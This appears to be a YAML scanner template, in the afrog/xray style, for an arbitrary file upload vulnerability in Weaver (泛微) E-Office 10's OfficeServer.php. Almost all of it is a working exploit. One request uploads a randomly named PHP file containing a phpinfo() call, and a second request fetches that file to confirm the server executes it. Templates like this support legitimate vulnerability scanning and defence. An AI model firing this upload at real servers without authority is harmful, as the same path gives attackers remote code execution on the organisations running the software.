id: e-office-v10-officeserver-upload

info:
  name: 泛微OA E-Office OfficeServer.php 任意文件上传漏洞
  author: zan8in
  severity: high
  verified: true
  descripiton: |
    泛微OA E-Office OfficeServer.php 存在任意文件上传漏洞，攻击者通过漏洞可以获取到服务器敏感信息
    "eoffice10"
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Office%20OfficeServer.php%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.html

set:
  randstr: randomLowercase(12)
  rboundary: randomLowercase(8)
rules:
  r0: 
    request:
      method: POST
      path: /eoffice10/server/public/iWebOffice2015/OfficeServer.php
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data;name=\"FileData\";filename=\"{{randstr}}.php\"\r\n\
        Content-Type: application/octet-stream\r\n\
        \r\n\
        <?php phpinfo();?>\r\n\
        \r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data;name=\"FormData\"\r\n\
        \r\n\
        {'USERNAME':'admin','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'{{randstr}}.php'}\r\n\
        ------WebKitFormBoundary{{rboundary}}--"
    expression: response.status == 200
  r1:
    request:
      method: GET
      path: /eoffice10/server/public/iWebOffice2015/Document/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(b'PHP Extension') && response.body.bcontains(b'PHP Version') && r'>PHP Version <\/td><td class="v">([0-9.]+)'.bmatches(response.body)
expression: r0() && r1()